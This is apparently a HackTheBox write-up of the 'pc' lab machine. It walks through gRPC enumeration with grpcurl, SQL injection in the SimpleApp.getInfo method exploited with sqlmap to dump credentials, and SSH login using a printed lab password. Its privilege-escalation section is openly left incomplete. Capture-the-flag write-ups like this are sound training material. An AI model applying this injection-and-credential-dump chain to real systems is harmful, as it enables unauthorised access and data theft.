HTB: pc Writeup

#htb #writeup #linux #sqlmap #nc #curl

Machine Banner

Machine Information

AttributeDetails
Namepc
OSLinux
DifficultyEasy
PointsN/A
Release DateN/A
IP Address10.129.92.20
AuthorD3vnomi

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐☆☆
  • CVE: ⭐☆☆☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

pc is a Easy-difficulty Linux machine featuring a gRPC service vulnerable to SQL injection. The exploitation path involves gRPC enumeration to discover services, leveraging SQLi to extract credentials, and gaining SSH access as the sau user.

TL;DR: gRPC Enumeration → SQL Injection → Credential Dump → SSH Access.

Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- 10.129.92.20

Results:

Port 50051 is open, running gRPC service.

Service Enumeration

gRPC Service Discovery:

Enumerate available gRPC services using grpcurl:

Terminal window
./grpcurl -plaintext 10.129.92.20:50051 list

Output:

SimpleApp
grpc.reflection.v1alpha.ServerReflection

List available methods in the SimpleApp service:

Terminal window
./grpcurl -plaintext 10.129.92.20:50051 list SimpleApp

Output:

SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo

Initial Foothold

Exploitation Path: SQL Injection

The gRPC service contains a SQL injection vulnerability in one of its methods. Using sqlmap, the vulnerability was exploited to extract data from the backend database.

Create a request file (sql.req) capturing the gRPC request:

Terminal window
./grpcurl -plaintext 10.129.92.20:50051 SimpleApp.getInfo -d '{"id":"<INJECTION_POINT>"}' > sql.req

Exploit using sqlmap:

Terminal window
sqlmap -r sql.req --dump

This reveals the backend database structure and extracts sensitive information.

User Compromise

Credential Discovery

The SQL injection exploitation via sqlmap dumped the application database, revealing user credentials:

UsernamePassword
adminadmin
sauHereIsYourPassWord1431

SSH Access

Connect to the target as the sau user:

Terminal window
ssh sau@10.129.92.20

Password: HereIsYourPassWord1431

User Flag

Terminal window
cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

Terminal window
sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

Exploitation (Root/Administrator)

[Notes incomplete]

Root Flag

Terminal window
cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["gRPC Enumeration<br/>(grpcurl)"] --> B["SQL Injection<br/>(SimpleApp.getInfo)"]
    B --> C["Credential Dump<br/>(sqlmap)"]
    C --> D["SSH Access<br/>(sau user)"]
    D --> E["User Flag"]
    E --> F["Privilege Escalation<br/>(incomplete)"]

Tools Used

ToolPurpose
grpcurlgRPC service enumeration and introspection
sqlmapSQL injection exploitation and database dumping
sshSSH client for remote access

Key Learnings

  • Thorough enumeration is critical — every open port and service can be a potential entry point.
  • Configuration files and databases often contain credentials that enable lateral movement.
  • Privilege escalation frequently depends on misconfigurations rather than software vulnerabilities.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy